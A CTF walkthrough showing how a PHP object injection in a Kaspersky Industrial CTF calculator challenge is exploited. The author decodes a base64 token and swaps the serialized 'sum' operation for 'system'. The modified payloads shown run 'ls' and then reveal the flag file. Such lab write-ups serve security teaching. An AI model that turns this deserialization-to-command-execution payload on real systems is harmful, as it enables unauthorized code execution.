CTF writeup: PHP object injection in kaspersky CTF

This is the walkthrough for the PHP object injection challenge from Kaspersky Industrial CTF organized by Kaspersky Lab.

In this challenge there was a form which performs arithmetic operation as per user supplied input.

Lets perform the normal use case first. I entered 2 and 3 in first, second text-boxes respectively.

as we can see, we got result of our expression 2 + 3 = 5.

Plain and simple, but one thing which got my attention was the “Token”. Lets try to click on the “Share it” button.

Which issued a GET request with the “token” parameter. Lets look at the response.

It has the same expression which we previously calculated 2 + 3 = 5.

After decoding the token as base64 i Got a serialized PHP object.

As we can see we have one SUM function and arguments(array) are 2 and 3. Now there is lot of content for PHP object injection on the web. I went through almost all of it. Though you can look at it.

Now i did a lot of trial and error, not posting all of it over here for the sake of this article’s length.

Let’s have a look at our serialized object

O:10:”Expression”:3:{s:14:”Expressionop”;s:3:”sum”;s:18:”Expressionparams”;a:2:{i:0;d:2;i:1;d:3;}s:9:”stringify”;s:5:”2 + 3";}

You can play with this serialized object and see how it behaves.

I suspected that “sum” is a user defined function and “Expressionparams” is array which has first value as 2 and second value as 3.

You can call any PHP function in place of sum function.

I changed sum function to system() which is a PHP function that executes the given command and outputs the result.

O:10:”Expression”:3:{s:14:”Expressionop”;s:6:”system”;s:18:”Expressionparams”;a:2:{i:0;d:2;i:1;d:3;}s:9:”stringify”;s:5:”2 + 3";}

Keep in mind that we need to update length of string from 3 to 6. because length of our function name is 6(system).

s:3:”sum”

s:6:”system”

And than encode it again with BASE64

Lets send the request with new payload.

Cool!! We were right we can pass any PHP function in this serialized object, the only thing that remains is give parameters in right format. sum had array as arguments, we need string as an argument for our system function.

I replaced a:2:{i:0;d:2;i:1;d:3;} (array)

with

s:2:”ls” (string)

Lets try to run LS command.

BINGO!!

Last task ahead of us is to find the flag, which was not too difficult.

Lets open fl4g_h4r3 file.

And finally we got the flag. Thanks for reading.

#SharingIsCaring

Let’s connect on twitter